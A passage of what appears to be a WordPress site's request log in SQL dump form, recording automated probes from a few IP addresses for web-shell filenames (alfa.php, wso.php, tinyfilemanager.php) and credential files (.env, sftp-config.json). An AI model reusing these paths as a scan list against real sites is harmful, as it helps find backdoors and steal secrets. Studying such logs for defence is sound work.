21:17:15'),(5382,'https://amb18b.com/wp-includes/Text/Diff/Renderer/','173.239.254.228','Direct Access',1,'2025-11-09 21:17:17','2025-11-09 21:17:17'),(5383,'https://amb18b.com/wp-admin/product.php','173.239.254.228','Direct Access',1,'2025-11-09 21:17:21','2025-11-09 21:17:21'),(5384,'https://amb18b.com/wp-includes/Text/chosen.php','173.239.254.228','Direct Access',1,'2025-11-09 21:17:25','2025-11-09 21:17:25'),(5385,'https://amb18b.com/elp.php','173.239.254.228','Direct Access',1,'2025-11-09 21:17:28','2025-11-09 21:17:28'),(5386,'https://amb18b.com/yasnu.php','173.239.254.228','Direct Access',1,'2025-11-09 21:17:32','2025-11-09 21:17:32'),(5387,'https://amb18b.com/.well-known/','173.239.254.228','Direct Access',1,'2025-11-09 21:17:36','2025-11-09 21:17:36'),(5388,'https://amb18b.com/wp-admin/classwithtostring.php','173.239.254.228','Direct Access',1,'2025-11-09 21:17:40','2025-11-09 21:17:40'),(5389,'https://amb18b.com/wp-includes/Text/Diff/Engine/','173.239.254.228','Direct Access',1,'2025-11-09 21:17:44','2025-11-09 21:17:44'),(5390,'https://amb18b.com/.well-known/pki-validation/index.php','173.239.254.228','Direct Access',1,'2025-11-09 21:17:47','2025-11-09 21:17:47'),(5391,'https://amb18b.com/.well-known/acme-challenge/about.php','173.239.254.228','Direct Access',1,'2025-11-09 21:17:51','2025-11-09 21:17:51'),(5392,'https://amb18b.com/flower.php','173.239.254.228','Direct Access',1,'2025-11-09 21:17:57','2025-11-09 21:17:57'),(5393,'https://amb18b.com/wp-includes/js/tinymce/plugins/directionality/index.php','173.239.254.228','Direct Access',1,'2025-11-09 21:18:00','2025-11-09 21:18:00'),(5394,'https://amb18b.com/wp-includes/block-supports/autoload_classmap.php','173.239.254.228','Direct Access',1,'2025-11-09 21:18:04','2025-11-09 21:18:04'),(5395,'https://amb18b.com/wp-includes/Text/Diff/Engine/wp.php','173.239.254.228','Direct Access',1,'2025-11-09 21:18:08','2025-11-09 21:18:08'),(5396,'https://amb18b.com/wp-includes/blocks/details/about.php','173.239.254.228','Direct Access',1,'2025-11-09 21:18:14','2025-11-09 21:18:14'),(5397,'https://amb18b.com/tinyfilemanager/tinyfilemanager.php','173.239.254.228','Direct Access',1,'2025-11-09 21:18:21','2025-11-09 21:18:21'),(5398,'https://amb18b.com/tinyfilemanager.php','173.239.254.228','Direct Access',1,'2025-11-09 21:18:26','2025-11-09 21:18:26'),(5399,'https://amb18b.com/fm.php','173.239.254.228','Direct Access',1,'2025-11-09 21:18:30','2025-11-09 21:18:30'),(5400,'https://amb18b.com/filemanager.php','173.239.254.228','Direct Access',1,'2025-11-09 21:18:34','2025-11-09 21:18:34'),(5401,'https://amb18b.com/tiny.php','173.239.254.228','Direct Access',1,'2025-11-09 21:18:39','2025-11-09 21:18:39'),(5402,'https://amb18b.com/031.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:15','2025-11-09 21:27:15'),(5403,'https://amb18b.com/ilex.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:17','2025-11-09 21:27:17'),(5404,'https://amb18b.com/flex.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:18','2025-11-09 21:27:18'),(5405,'https://amb18b.com/222.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:19','2025-11-09 21:27:19'),(5406,'https://amb18b.com/444.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:20','2025-11-09 21:27:20'),(5407,'https://amb18b.com/file9.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:21','2025-11-09 21:27:21'),(5408,'https://amb18b.com/filesss.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:22','2025-11-09 21:27:22'),(5409,'https://amb18b.com/file88.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:23','2025-11-09 21:27:23'),(5410,'https://amb18b.com/gifclass4.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:24','2025-11-09 21:27:24'),(5411,'https://amb18b.com/555.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:25','2025-11-09 21:27:25'),(5412,'https://amb18b.com/333.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:26','2025-11-09 21:27:26'),(5413,'https://amb18b.com/hly.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:28','2025-11-09 21:27:28'),(5414,'https://amb18b.com/d12.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:29','2025-11-09 21:27:29'),(5415,'https://amb18b.com/2clas.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:30','2025-11-09 21:27:30'),(5416,'https://amb18b.com/bless5.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:31','2025-11-09 21:27:31'),(5417,'https://amb18b.com/file15.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:32','2025-11-09 21:27:32'),(5418,'https://amb18b.com/hk.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:33','2025-11-09 21:27:33'),(5419,'https://amb18b.com/alpa.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:34','2025-11-09 21:27:34'),(5420,'https://amb18b.com/file21.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:35','2025-11-09 21:27:35'),(5421,'https://amb18b.com/ssss.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:36','2025-11-09 21:27:36'),(5422,'https://amb18b.com/ut.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:37','2025-11-09 21:27:37'),(5423,'https://amb18b.com/inde.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:39','2025-11-09 21:27:39'),(5424,'https://amb18b.com/classgoto24.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:40','2025-11-09 21:27:40'),(5425,'https://amb18b.com/030.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:41','2025-11-09 21:27:41'),(5426,'https://amb18b.com/thh.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:42','2025-11-09 21:27:42'),(5427,'https://amb18b.com/indo.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:43','2025-11-09 21:27:43'),(5428,'https://amb18b.com/fileas.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:44','2025-11-09 21:27:44'),(5429,'https://amb18b.com/yellow.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:45','2025-11-09 21:27:45'),(5430,'https://amb18b.com/33.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:47','2025-11-09 21:27:47'),(5431,'https://amb18b.com/plss3.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:48','2025-11-09 21:27:48'),(5432,'https://amb18b.com/he.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:49','2025-11-09 21:27:49'),(5433,'https://amb18b.com/thxt.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:50','2025-11-09 21:27:50'),(5434,'https://amb18b.com/wfile.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:52','2025-11-09 21:27:52'),(5435,'https://amb18b.com/class20.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:53','2025-11-09 21:27:53'),(5436,'https://amb18b.com/1.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:54','2025-11-09 21:27:54'),(5437,'https://amb18b.com/usep.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:55','2025-11-09 21:27:55'),(5438,'https://amb18b.com/wa.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:56','2025-11-09 21:27:56'),(5439,'https://amb18b.com/wb.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:57','2025-11-09 21:27:57'),(5440,'https://amb18b.com/file1.php','20.78.70.188','Direct Access',1,'2025-11-09 21:27:58','2025-11-09 21:27:58'),(5441,'https://amb18b.com/2.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:00','2025-11-09 21:28:00'),(5442,'https://amb18b.com/a2.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:01','2025-11-09 21:28:01'),(5443,'https://amb18b.com/a.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:02','2025-11-09 21:28:02'),(5444,'https://amb18b.com/gmo.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:03','2025-11-09 21:28:03'),(5445,'https://amb18b.com/info.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:05','2025-11-09 21:28:05'),(5446,'https://amb18b.com/file2.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:06','2025-11-09 21:28:06'),(5447,'https://amb18b.com/lv.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:07','2025-11-09 21:28:07'),(5448,'https://amb18b.com/about.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:08','2025-11-09 21:28:08'),(5449,'https://amb18b.com/abcd.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:09','2025-11-09 21:28:09'),(5450,'https://amb18b.com/lock360.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:10','2025-11-09 21:28:10'),(5451,'https://amb18b.com/alfa.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:12','2025-11-09 21:28:12'),(5452,'https://amb18b.com/NewFile.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:13','2025-11-09 21:28:13'),(5453,'https://amb18b.com/atomlib.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:14','2025-11-09 21:28:14'),(5454,'https://amb18b.com/--.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:15','2025-11-09 21:28:15'),(5455,'https://amb18b.com/system_log.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:16','2025-11-09 21:28:16'),(5456,'https://amb18b.com/pp.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:18','2025-11-09 21:28:18'),(5457,'https://amb18b.com/geck.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:19','2025-11-09 21:28:19'),(5458,'https://amb18b.com/gm.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:21','2025-11-09 21:28:21'),(5459,'https://amb18b.com/makeasmtp.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:22','2025-11-09 21:28:22'),(5460,'https://amb18b.com/file4.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:23','2025-11-09 21:28:23'),(5461,'https://amb18b.com/lala.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:24','2025-11-09 21:28:24'),(5462,'https://amb18b.com/admin.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:30','2025-11-09 21:28:30'),(5463,'https://amb18b.com/7.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:31','2025-11-09 21:28:31'),(5464,'https://amb18b.com/file18.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:33','2025-11-09 21:28:33'),(5465,'https://amb18b.com/ffile.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:34','2025-11-09 21:28:34'),(5466,'https://amb18b.com/file7.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:35','2025-11-09 21:28:35'),(5467,'https://amb18b.com/we.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:37','2025-11-09 21:28:37'),(5468,'https://amb18b.com/gfile.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:38','2025-11-09 21:28:38'),(5469,'https://amb18b.com/jlex3.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:39','2025-11-09 21:28:39'),(5470,'https://amb18b.com/des.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:40','2025-11-09 21:28:40'),(5471,'https://amb18b.com/aaa.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:41','2025-11-09 21:28:41'),(5472,'https://amb18b.com/gifclass.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:42','2025-11-09 21:28:42'),(5473,'https://amb18b.com/vee.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:43','2025-11-09 21:28:43'),(5474,'https://amb18b.com/efile.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:44','2025-11-09 21:28:44'),(5475,'https://amb18b.com/afile.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:46','2025-11-09 21:28:46'),(5476,'https://amb18b.com/errorfile.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:47','2025-11-09 21:28:47'),(5477,'https://amb18b.com/f35.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:49','2025-11-09 21:28:49'),(5478,'https://amb18b.com/gool.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:51','2025-11-09 21:28:51'),(5479,'https://amb18b.com/haikh.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:53','2025-11-09 21:28:53'),(5480,'https://amb18b.com/135.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:55','2025-11-09 21:28:55'),(5481,'https://amb18b.com/enclas.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:56','2025-11-09 21:28:56'),(5482,'https://amb18b.com/ioxi-o.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:57','2025-11-09 21:28:57'),(5483,'https://amb18b.com/wp-admin/js/wp-conflg.php','20.78.70.188','Direct Access',1,'2025-11-09 21:28:59','2025-11-09 21:28:59'),(5484,'https://amb18b.com/classwithtostring.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:01','2025-11-09 21:29:01'),(5485,'https://amb18b.com/image.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:02','2025-11-09 21:29:02'),(5486,'https://amb18b.com/wp-admin/wp-conflg.php?p=','20.78.70.188','Direct Access',1,'2025-11-09 21:29:04','2025-11-09 21:29:04'),(5487,'https://amb18b.com/mail.php?','20.78.70.188','Direct Access',1,'2025-11-09 21:29:05','2025-11-09 21:29:05'),(5488,'https://amb18b.com/sx.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:06','2025-11-09 21:29:06'),(5489,'https://amb18b.com/max.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:08','2025-11-09 21:29:08'),(5490,'https://amb18b.com/size.php?p=','20.78.70.188','Direct Access',1,'2025-11-09 21:29:09','2025-11-09 21:29:09'),(5491,'https://amb18b.com/mpxct.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:10','2025-11-09 21:29:10'),(5492,'https://amb18b.com/0xx.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:11','2025-11-09 21:29:11'),(5493,'https://amb18b.com/s.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:13','2025-11-09 21:29:13'),(5494,'https://amb18b.com/hq.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:14','2025-11-09 21:29:14'),(5495,'https://amb18b.com/blox.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:15','2025-11-09 21:29:15'),(5496,'https://amb18b.com/ant.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:17','2025-11-09 21:29:17'),(5497,'https://amb18b.com/fso.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:18','2025-11-09 21:29:18'),(5498,'https://amb18b.com/htaccess.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:19','2025-11-09 21:29:19'),(5499,'https://amb18b.com/wp-trackback.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:20','2025-11-09 21:29:20'),(5500,'https://amb18b.com/readme.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:23','2025-11-09 21:29:23'),(5501,'https://amb18b.com/v.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:24','2025-11-09 21:29:24'),(5502,'https://amb18b.com/sck.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:26','2025-11-09 21:29:26'),(5503,'https://amb18b.com/X7x.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:27','2025-11-09 21:29:27'),(5504,'https://amb18b.com/xpass.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:28','2025-11-09 21:29:28'),(5505,'https://amb18b.com/bless.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:29','2025-11-09 21:29:29'),(5506,'https://amb18b.com/bless2.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:31','2025-11-09 21:29:31'),(5507,'https://amb18b.com/bless6.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:32','2025-11-09 21:29:32'),(5508,'https://amb18b.com/bless10.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:33','2025-11-09 21:29:33'),(5509,'https://amb18b.com/bless11.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:34','2025-11-09 21:29:34'),(5510,'https://amb18b.com/wp-admin/js/index.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:36','2025-11-09 21:29:36'),(5511,'https://amb18b.com/thoms.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:37','2025-11-09 21:29:37'),(5512,'https://amb18b.com/xsas.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:38','2025-11-09 21:29:38'),(5513,'https://amb18b.com/xrp.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:40','2025-11-09 21:29:40'),(5514,'https://amb18b.com/wp-freya.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:41','2025-11-09 21:29:41'),(5515,'https://amb18b.com/css/index.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:42','2025-11-09 21:29:42'),(5516,'https://amb18b.com/file30.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:44','2025-11-09 21:29:44'),(5517,'https://amb18b.com/fesa.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:45','2025-11-09 21:29:45'),(5518,'https://amb18b.com/class-.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:47','2025-11-09 21:29:47'),(5519,'https://amb18b.com/up.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:48','2025-11-09 21:29:48'),(5520,'https://amb18b.com/403.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:50','2025-11-09 21:29:50'),(5521,'https://amb18b.com/9v6.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:53','2025-11-09 21:29:53'),(5522,'https://amb18b.com/lte7.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:55','2025-11-09 21:29:55'),(5523,'https://amb18b.com/1vbqo.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:56','2025-11-09 21:29:56'),(5524,'https://amb18b.com/l10n.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:58','2025-11-09 21:29:58'),(5525,'https://amb18b.com/tajj.php','20.78.70.188','Direct Access',1,'2025-11-09 21:29:59','2025-11-09 21:29:59'),(5526,'https://amb18b.com/fdd2.php','20.78.70.188','Direct Access',1,'2025-11-09 21:30:00','2025-11-09 21:30:00'),(5527,'https://amb18b.com/class9.php','20.78.70.188','Direct Access',1,'2025-11-09 21:30:02','2025-11-09 21:30:02'),(5528,'https://amb18b.com/sto.php','20.78.70.188','Direct Access',1,'2025-11-09 21:30:03','2025-11-09 21:30:03'),(5529,'https://amb18b.com/7h.php','20.78.70.188','Direct Access',1,'2025-11-09 21:30:05','2025-11-09 21:30:05'),(5530,'https://amb18b.com/fh26.php','20.78.70.188','Direct Access',1,'2025-11-09 21:30:06','2025-11-09 21:30:06'),(5531,'https://amb18b.com/ixj.php','20.78.70.188','Direct Access',1,'2025-11-09 21:30:08','2025-11-09 21:30:08'),(5532,'https://amb18b.com/x23.php','20.78.70.188','Direct Access',1,'2025-11-09 21:30:09','2025-11-09 21:30:09'),(5533,'https://amb18b.com/zeu.php','20.78.70.188','Direct Access',1,'2025-11-09 21:30:10','2025-11-09 21:30:10'),(5534,'https://amb18b.com/f2r4.php','20.78.70.188','Direct Access',1,'2025-11-09 21:30:12','2025-11-09 21:30:12'),(5535,'https://amb18b.com/lopst.php','20.78.70.188','Direct Access',1,'2025-11-09 21:30:13','2025-11-09 21:30:13'),(5536,'https://amb18b.com/gecko.php','20.78.70.188','Direct Access',1,'2025-11-09 21:30:14','2025-11-09 21:30:14'),(5537,'https://amb18b.com/0xs.php','20.78.70.188','Direct Access',1,'2025-11-09 21:30:16','2025-11-09 21:30:16'),(5538,'https://amb18b.com/Zeiss.php','20.78.70.188','Direct Access',1,'2025-11-09 21:30:17','2025-11-09 21:30:17'),(5539,'https://amb18b.com/x0x.php','20.78.70.188','Direct Access',1,'2025-11-09 21:30:19','2025-11-09 21:30:19'),(5540,'https://amb18b.com/adin.php','20.78.70.188','Direct Access',1,'2025-11-09 21:30:20','2025-11-09 21:30:20'),(5541,'https://amb18b.com/wsz.php','20.78.70.188','Direct Access',1,'2025-11-09 21:30:22','2025-11-09 21:30:22'),(5542,'https://amb18b.com/ahy66.php','20.78.70.188','Direct Access',1,'2025-11-09 21:30:23','2025-11-09 21:30:23'),(5543,'https://amb18b.com/thai.php','20.78.70.188','Direct Access',1,'2025-11-09 21:30:24','2025-11-09 21:30:24'),(5544,'https://amb18b.com/dex.php','20.78.70.188','Direct Access',1,'2025-11-09 21:30:26','2025-11-09 21:30:26'),(5545,'https://amb18b.com/zen.php','20.78.70.188','Direct Access',1,'2025-11-09 21:30:27','2025-11-09 21:30:27'),(5546,'https://amb18b.com/sftp-config.json','103.77.106.118','Direct Access',1,'2025-11-09 22:17:18','2025-11-09 22:17:18'),(5547,'https://amb18b.com/.vscode/sftp.json','103.77.106.118','Direct Access',1,'2025-11-09 22:17:21','2025-11-09 22:17:21'),(5548,'https://amb18b.com/.env','45.80.158.128','Direct Access',1,'2025-11-09 22:22:47','2025-11-09 22:22:47'),(5549,'https://amb18b.com/link.php','172.207.9.124','Direct Access',2,'2025-11-10 00:01:54','2025-11-10 00:01:11'),(5550,'https://amb18b.com/chosen.php?p=','172.207.9.124','Direct Access',1,'2025-11-10 00:01:13','2025-11-10 00:01:13'),(5551,'https://amb18b.com/mail.php','172.207.9.124','Direct Access',1,'2025-11-10 00:01:14','2025-11-10 00:01:14'),(5552,'https://amb18b.com/lock360.php','172.207.9.124','Direct Access',1,'2025-11-10 00:01:16','2025-11-10 00:01:16'),(5553,'https://amb18b.com/function.php','172.207.9.124','Direct Access',1,'2025-11-10 00:01:18','2025-11-10 00:01:18'),(5554,'https://amb18b.com/classwithtostring.php','172.207.9.124','Direct Access',1,'2025-11-10 00:01:19','2025-11-10 00:01:19'),(5555,'https://amb18b.com/1.php','172.207.9.124','Direct Access',1,'2025-11-10 00:01:20','2025-11-10 00:01:20'),(5556,'https://amb18b.com/autoload_classmap.php?p=','172.207.9.124','Direct Access',1,'2025-11-10 00:01:22','2025-11-10 00:01:22'),(5557,'https://amb18b.com/post.php','172.207.9.124','Direct Access',1,'2025-11-10 00:01:23','2025-11-10 00:01:23'),(5558,'https://amb18b.com/wp-conflg.php?p=','172.207.9.124','Direct Access',1,'2025-11-10 00:01:24','2025-11-10 00:01:24'),(5559,'https://amb18b.com/manager.php?p=','172.207.9.124','Direct Access',1,'2025-11-10 00:01:26','2025-11-10 00:01:26'),(5560,'https://amb18b.com/alfa.php','172.207.9.124','Direct Access',1,'2025-11-10 00:01:27','2025-11-10 00:01:27'),(5561,'https://amb18b.com/goods.php','172.207.9.124','Direct Access',1,'2025-11-10 00:01:29','2025-11-10 00:01:29'),(5562,'https://amb18b.com/wp-trackback.php','172.207.9.124','Direct Access',1,'2025-11-10 00:01:30','2025-11-10 00:01:30'),(5563,'https://amb18b.com/about.php?p=','172.207.9.124','Direct Access',1,'2025-11-10 00:01:31','2025-11-10 00:01:31'),(5564,'https://amb18b.com/themes.php','172.207.9.124','Direct Access',1,'2025-11-10 00:01:32','2025-11-10 00:01:32'),(5565,'https://amb18b.com/simple.php','172.207.9.124','Direct Access',1,'2025-11-10 00:01:35','2025-11-10 00:01:35'),(5566,'https://amb18b.com/class.php?p=','172.207.9.124','Direct Access',1,'2025-11-10 00:01:36','2025-11-10 00:01:36'),(5567,'https://amb18b.com/as.php','172.207.9.124','Direct Access',1,'2025-11-10 00:01:38','2025-11-10 00:01:38'),(5568,'https://amb18b.com/file.php','172.207.9.124','Direct Access',1,'2025-11-10 00:01:40','2025-11-10 00:01:40'),(5569,'https://amb18b.com/bless.php','172.207.9.124','Direct Access',1,'2025-11-10 00:01:41','2025-11-10 00:01:41'),(5570,'https://amb18b.com/alfanew.php','172.207.9.124','Direct Access',2,'2025-11-10 00:02:42','2025-11-10 00:01:43'),(5571,'https://amb18b.com/404.php?fm=true','172.207.9.124','Direct Access',1,'2025-11-10 00:01:44','2025-11-10 00:01:44'),(5572,'https://amb18b.com/ini.php','172.207.9.124','Direct Access',1,'2025-11-10 00:01:46','2025-11-10 00:01:46'),(5573,'https://amb18b.com/fm.php?p=','172.207.9.124','Direct Access',1,'2025-11-10 00:01:47','2025-11-10 00:01:47'),(5574,'https://amb18b.com/atomlib.php','172.207.9.124','Direct Access',1,'2025-11-10 00:01:48','2025-11-10 00:01:48'),(5575,'https://amb18b.com/inputs.php?p=','172.207.9.124','Direct Access',1,'2025-11-10 00:01:49','2025-11-10 00:01:49'),(5576,'https://amb18b.com/moon.php?p=','172.207.9.124','Direct Access',1,'2025-11-10 00:01:51','2025-11-10 00:01:51'),(5577,'https://amb18b.com/lv.php','172.207.9.124','Direct Access',2,'2025-11-10 00:02:41','2025-11-10 00:01:52'),(5578,'https://amb18b.com/cong.php','172.207.9.124','Direct Access',1,'2025-11-10 00:01:53','2025-11-10 00:01:53'),(5579,'https://amb18b.com/buy.php','172.207.9.124','Direct Access',1,'2025-11-10 00:01:56','2025-11-10 00:01:56'),(5580,'https://amb18b.com/zfile.php','172.207.9.124','Direct Access',1,'2025-11-10 00:01:57','2025-11-10 00:01:57'),(5581,'https://amb18b.com/css.php','172.207.9.124','Direct Access',1,'2025-11-10 00:01:59','2025-11-10 00:01:59'),(5582,'https://amb18b.com/radio.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:00','2025-11-10 00:02:00'),(5583,'https://amb18b.com/wp.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:03','2025-11-10 00:02:03'),(5584,'https://amb18b.com/abcd.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:04','2025-11-10 00:02:04'),(5585,'https://amb18b.com/nc4.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:06','2025-11-10 00:02:06'),(5586,'https://amb18b.com/wso.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:07','2025-11-10 00:02:07'),(5587,'https://amb18b.com/rss.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:08','2025-11-10 00:02:08'),(5588,'https://amb18b.com/ant.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:09','2025-11-10 00:02:09'),(5589,'https://amb18b.com/ioxi-o.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:11','2025-11-10 00:02:11'),(5590,'https://amb18b.com/wpc.php?p=','172.207.9.124','Direct Access',1,'2025-11-10 00:02:13','2025-11-10 00:02:13'),(5591,'https://amb18b.com/js.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:14','2025-11-10 00:02:14'),(5592,'https://amb18b.com/ar.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:15','2025-11-10 00:02:15'),(5593,'https://amb18b.com/xmrlpc.php?p=','172.207.9.124','Direct Access',1,'2025-11-10 00:02:17','2025-11-10 00:02:17'),(5594,'https://amb18b.com/c.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:18','2025-11-10 00:02:18'),(5595,'https://amb18b.com/byp.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:20','2025-11-10 00:02:20'),(5596,'https://amb18b.com/fm1.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:21','2025-11-10 00:02:21'),(5597,'https://amb18b.com/doc.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:23','2025-11-10 00:02:23'),(5598,'https://amb18b.com/Angelv2.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:25','2025-11-10 00:02:25'),(5599,'https://amb18b.com/acp.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:26','2025-11-10 00:02:26'),(5600,'https://amb18b.com/gdn.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:27','2025-11-10 00:02:27'),(5601,'https://amb18b.com/asas.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:28','2025-11-10 00:02:28'),(5602,'https://amb18b.com/123.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:30','2025-11-10 00:02:30'),(5603,'https://amb18b.com/v1.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:31','2025-11-10 00:02:31'),(5604,'https://amb18b.com/v2.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:33','2025-11-10 00:02:33'),(5605,'https://amb18b.com/rk2.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:34','2025-11-10 00:02:34'),(5606,'https://amb18b.com/222.php?p=','172.207.9.124','Direct Access',1,'2025-11-10 00:02:36','2025-11-10 00:02:36'),(5607,'https://amb18b.com/wp-22.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:37','2025-11-10 00:02:37'),(5608,'https://amb18b.com/lc.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:38','2025-11-10 00:02:38'),(5609,'https://amb18b.com/mini.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:40','2025-11-10 00:02:40'),(5610,'https://amb18b.com/m.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:44','2025-11-10 00:02:44'),(5611,'https://amb18b.com/db.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:45','2025-11-10 00:02:45'),(5612,'https://amb18b.com/aks.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:46','2025-11-10 00:02:46'),(5613,'https://amb18b.com/f.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:47','2025-11-10 